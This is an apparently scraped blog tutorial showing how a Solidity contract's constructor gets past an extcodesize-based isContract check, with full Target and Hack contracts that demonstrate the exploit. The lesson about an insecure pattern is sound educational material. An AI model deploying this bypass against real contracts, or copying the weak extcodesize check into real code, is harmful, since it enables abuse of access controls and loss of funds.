Bypass Contract Size Check - Code World

Bypass Contract Size Check

Enterprise 2022-03-23 14:38:10 views: null

Vulnerability

If an address is a contract then the size of code stored at the address will be greater than 0 right?

Let's see how we can create a contract with code size returned by extcodesize equal to 0.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

contract Target {
    function isContract(address account) public view returns (bool) {
        // This method relies on extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.
        uint size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    bool public pwned = false;

    function protected() external {
        require(!isContract(msg.sender), "no contract allowed");
        pwned = true;
    }
}

contract FailedAttack {
    // Attempting to call Target.protected will fail,
    // Target block calls from contract
    function pwn(address _target) external {
        // This will fail
        Target(_target).protected();
    }
}

contract Hack {
    bool public isContract;
    address public addr;

    // When contract is being created, code size (extcodesize) is 0.
    // This will bypass the isContract() check
    constructor(address _target) {
        isContract = Target(_target).isContract(address(this));
        addr = address(this);
        // This will work
        Target(_target).protected();
    }
}

Try on Remix

Guess you like

Origin blog.csdn.net/yanning1314/article/details/122836040

Bypass Contract Size Check

Check database size

How to check the size of tomcatjvm

check file size linux

Check file size

linux check folder size and file size

Check the size of compiled code Keil

Check Linux Disk Space Size

How to Check the Size of a Folder in Linux

How to check memory size in linux

Stack bypass the check source code analysis techniques housr_of_spirit

Simple-check-100-GDB dynamic debugging bypass judgment function

Check size and then perform operation - is it safe for ConcurrentLinkedDeque?

How to check the storage size of a mysql database

Check disk space size and clear space

Command to check swap partition size under Linux

Check file and folder size under Linux

Check file and folder size under Linux

Check disk space size and clear space

Java - Fastest way to check the size of String

How to check the data size of each table in mysql

How to check the size or capacity of images on a web page?

Check the size of folders and files in Linux system

How to check the size of each folder in Linux

Check hard disk size on Linux (Centos)

Android 8.0 Only fullscreen opaque activities can request orientation problem (Hook way to bypass the check elegantly)

Check the hard disk type, size and other information under linux

With the murder max-http-header-size initiator (A: Method check gc)

Linux check disk, mount disk, disk size common operations

How to compare two different size arraylists and check for order of elements

Recommended

Arc Browser for Windows 1.0 officially GA

A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!

Ranking

1. Select Sort

Create a thread thread

3 press to play ball that reach 6

Programmation CUDA (4) : gestion de la mémoire

SpringBoot database connection pool Druid error

E Diudiu App redesign summary

4EVERLAND Hosting now supports SNS+IPFS

About HTTPS

[vue3+vite+ts+element-plu+sass] uses bug records in sass

Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling

Daily

More

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)